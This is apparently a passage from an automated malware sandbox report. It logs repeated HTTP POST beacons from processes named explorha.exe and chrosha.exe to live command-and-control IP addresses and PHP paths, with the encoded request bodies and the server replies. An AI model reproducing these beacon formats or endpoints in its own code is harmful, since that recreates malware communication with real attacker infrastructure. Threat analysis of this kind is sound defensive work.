                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:03.971520901 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:03.974216938 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:04.222142935 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      237192.168.2.550078193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:04.105647087 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:04.351269007 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      238192.168.2.550079193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:04.579916000 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:04.821367025 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      239192.168.2.550080193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:04.707042933 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:04.949771881 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      240192.168.2.550081193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:05.065752029 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:05.309966087 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      241192.168.2.550082193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:05.201503992 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:05.454641104 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      242192.168.2.550083193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:05.667602062 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:05.916192055 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      243192.168.2.550084193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:05.817188025 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:06.061609983 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      244192.168.2.550085193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:06.164635897 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:06.413126945 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      245192.168.2.550086193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:06.315279961 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:06.567028046 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      246192.168.2.550087193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:06.770817041 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:07.013602972 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      247192.168.2.550088193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:06.935767889 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:07.183952093 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      248192.168.2.550089193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:07.267776012 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:07.521595001 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      249192.168.2.550090193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:07.437946081 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:07.691354990 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      250192.168.2.550091193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:07.890989065 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:08.142723083 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      251192.168.2.550092193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:08.055644989 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:08.303412914 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      252192.168.2.550095147.185.221.19309467324C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
